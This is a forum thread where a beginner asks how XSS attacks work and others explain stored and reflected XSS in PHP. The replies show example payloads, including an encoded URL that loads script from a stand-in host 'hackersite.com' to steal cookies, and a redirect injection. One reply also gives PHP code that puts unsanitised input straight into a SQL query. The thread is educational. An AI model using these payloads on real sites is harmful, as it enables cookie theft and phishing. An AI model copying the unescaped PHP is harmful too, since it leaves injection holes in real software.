Understanding XSS attacks ...

[pepelepew1962]

Hello:

 

I am really trying to understand XSS attacks and can't seem to wrap my head around it, I would rather seem like a fool than program like one with holes in it.  My problem  is understanding how an attack occurs.  Let's say Mary logs into the system and creates a record in the table via an html form.  I have php filters and validation for the data before it actually goes into mysql table.  My question is how does John attack my website? Or more important, how does he actually change files?  If he were to have a log in and gains access because it doesn't take much to register, how?  Is it a matter of the filter being bad and his XSS scipt is in a record and when someone open/views that

record (field) the script is launched?  I have read lots on how the javascript, for example, is placed in the url or form fields but nothing explains whether the information is saved and launched via the record stored in the database.

[scootstah]

So let's say you have a form that saves user input to a database and then displays it somewhere else on the website. Let's say it's a comment form.

 

So John comes along and types this as his comment:

<script>alert("I'm John");</script>

 

Now every user that views that comment will have an alert box pop up. One of the biggies here is being able to steal or alter cookies. John could potentially steal your login cookie and become you. He could also do all kinds of malicious things on the page to try to infect people with malware.

 

As for protecting against it, you have two options. You can either convert HTML characters to entities so that the HTML is not parsed, which (should) protect against XSS. The other option, say if you want to actually display user-submitted HTML, is to filter out anything that can be used maliciously as XSS. Doing that is pretty complicated so if that's the route you want to take, I would recommend HTML Purifier.

[pepelepew1962]

Thank you for your response.  You answered everything in the first 3 sentences.

[kicken]

Note that these types of protections need to be applied anywhere you have any type of user generated content, whether it comes from data put into the DB or just from a URL parameter.  Say for instance you have a email form for sending an inquiry about a product, and you pass the product name in the URL to say, pre-fill the subject of the email form:

 

www.example.com/inquiry.php?prod=Super+Delux+Widget

then in your code:

<input type="text" name="subject" value="Inquiry about <?php echo $_GET['prod']; ?>">

 

A malicious user could use that as an attack vector to inject code.  For instance, a URL such as:

www.example.com/inquiry.php?prod=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fhackersite.com%2Fscript.js%22%3E%3C%2Fscript%3E

 

would cause the page to load and execute the JS located at http://hackersite.com/script.js.  That script could do any number of things such as steal the cookies, redirect them to a phishing site, re-write your site, etc.  For that type of attack, they don't even have to sign up or register or anything on your site, just get users to follow that special URL, say via a spam email or other site promising a discount or something.

 

edit:

I feel that I should clarify that "user generated content" does not just mean something that a user types in on a form on your site.  It includes any data you get from an uncontrollable source, such as any url, post, or cookie variable. 

 

In the example above, the intent is that on each of your individual product pages, you would set the prod parameter to that products name.  It's not intended that the user ever enter it manually or change it from what you have set.  However since it is just a url variable it is quite easy and possible for someone to change it, that is why you need to take the precautions regardless.

 

 

[Andy-H]

A classic one is profile images, let's say crappy-website.com has user profiles, and you can post a URL to a profile image for your profile.

 

 

$image = $_POST['image_url'];
mysql_query("UPDATE users SET image_url = '$image' WHERE user_id = ". $_SESSION['id'] ." LIMIT 1");

<input type="text" name="image_url" >

 

 

//select info
echo '<img src="'. $image .'" >';

 

 

Now, lets say I input image url as:

 

 

http://myimage.com.image.jpg\' <script type="text/javascript">window.location.href=\'http://nicking-your-traffic.com\';</script>